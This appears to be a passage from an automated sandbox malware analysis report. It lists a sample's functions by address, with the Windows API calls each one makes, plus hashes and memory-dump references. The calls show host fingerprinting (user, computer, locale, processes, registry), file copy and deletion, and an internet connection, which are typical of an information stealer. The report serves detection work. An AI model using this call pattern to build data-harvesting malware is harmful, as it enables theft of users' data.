                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                                                                        • Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,043EC7E8,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,04406490,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                                                                        • Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(04403850,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04406DD8,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04402B50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • SetEnvironmentVariableA.KERNEL32(04403850,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                                                        • API String ID: 2929475105-4027016359
                                                                                                                                                                                                                                                                                        • Opcode ID: 8ade76cb7972d7545d1cdae6b8c2efec5127d19485faea56a3866a558087ec3a
                                                                                                                                                                                                                                                                                        • Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ade76cb7972d7545d1cdae6b8c2efec5127d19485faea56a3866a558087ec3a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                        • String ID: :h@$:h@$@:h@
                                                                                                                                                                                                                                                                                        • API String ID: 544645111-3492212131
                                                                                                                                                                                                                                                                                        • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                                                                        • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04407710,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 211194620-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cd629de8ee10eada1f72c85526e9c289853b14595428188ec74a26340a2c39ec
                                                                                                                                                                                                                                                                                        • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd629de8ee10eada1f72c85526e9c289853b14595428188ec74a26340a2c39ec
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                                                                          • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,043EC7E8,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,04406490,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04406D78,00000000,?,0041D74C,00000000,?,00000000,00000000,?,044035C0), ref: 0041438F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04406D78,00000000,?,0041D74C,00000000,?,00000000,00000000,?,044035C0), ref: 00414396
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,044037A0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,044062E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,04406E58,00000000), ref: 004144C0
                                                                                                                                                                                                                                                                                          • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                                                                          • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,044062E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,04406E58,00000000), ref: 00414542
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,04406C58,00000000,?,0041D76C,00000000,?,00000000,00000000,?,04406550,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,043EC9E0,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04406E98,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                                                                                                                                                                                                          • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04406340,00000000,?,0041D774,00000000,?,00000000,00000000,?,044062B0), ref: 0041496D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,043EC0B8,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                                                                                                                                                                                                        • String ID: E.A
                                                                                                                                                                                                                                                                                        • API String ID: 1035121393-2211245587
                                                                                                                                                                                                                                                                                        • Opcode ID: 8b033d71a75b0a659c9550832104cb48f202312a58c6f872a4bc729aaadf1e74
                                                                                                                                                                                                                                                                                        • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b033d71a75b0a659c9550832104cb48f202312a58c6f872a4bc729aaadf1e74
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,04406088), ref: 0040971B
